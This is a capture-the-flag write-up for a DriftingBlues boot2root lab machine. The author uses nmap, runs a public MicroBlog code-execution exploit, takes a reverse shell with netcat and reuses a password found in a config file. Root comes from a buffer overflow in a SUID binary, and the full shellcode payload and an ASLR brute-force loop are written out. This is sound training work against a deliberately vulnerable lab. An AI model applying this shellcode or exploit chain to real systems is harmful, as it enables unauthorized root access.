This is the write-up for the boot2root machine of DriftingBlues series. If you want to try it along with me, you can download it from here.
Start the nmap, and scan for all open ports.
Service version detection using nmap.
Ports 111 and 48331 has nothing interesting, so I directly open the IP address in browser.
When I viewed the page source, I came to know that it is a MicroBlog v.1.0.1
A Google search showed the very first link for the exploit. Downloaded it on my local machine and execute it and got the code execution.
python2 33070.py http://192.168.9.97
As the above shell is not very friendly, I created a shell script with a reverse shell payload and downloaded it on the box. Start the netcat listener on kali to get the reverse shell.
Now I have a better shell, the box has user “clapton”, we also have a same user in base.inc.php and also his password, using this password I am able to login as clapton user.
The note.txt is the clear indication of we need to use Buffer Overflow to get root. As we can see ‘input’ is the suid binary which we need to exploit using BoF to get the root on the box.
Till this point the box is very easy, now to exploit BoF, I transfer the binary to my Kali machine.
Lets use gdb, pattern_create.rb and pattern_offset.rb.
- Start the binary using gdb.
- Provide string of length of around 200. Observed the segmentation fault.
3. Examine esp will get full of A’s.
4. Let’s create a pattern to get exact number of A’s after which we can overwrite the EIP.
5. Let’s use patter_offset to find after how many bytes we can overwrite the EIP. After 171 bytes we can overwrite the EIP.
6. To prove this, we need to create a string of 171 “A” + “BBBB” + 80 “D”
Instead of BBBB, need an address of the register so that execute the shell code. I will use the same shell code used here. We also need the nop (No Operation)sled, so that we can comfortably execute shell code. To test the exploit we also ASLR (Address Space Layout Randomization) needs to be off. On my Kali machine it is on, need to set its value to 0.
42424242 (BBBB) is for EIP, 90 is nop sled and in green it is shell code. On the victim, the ASLR is ON. We need root privilege to turn it off. And for EIP can use any address where nop sled is. I used “0xbf900de0”. Remember we need to use it in reverse order i.e. “\xe0\x0d\x90\xbf”. To solve the problem of ASLR we need to run the program with loop.
Final Payload:
$(python -c ‘print(“A”*171 + “\xe0\x0d\x90\xbf” + “\x90” * 48 + “\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80”)’
for i in {1..1000}; do (echo $i && ./input $(python -c ‘print(“A”*171 + “\xe0\x0d\x90\xbf” + “\x90” * 48 + “\x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80”)’)); done
When I execute above line after 924 tries I got the root shell.This might be different in your case.
Final Flag:
Thanks for reading. Hope you like it.
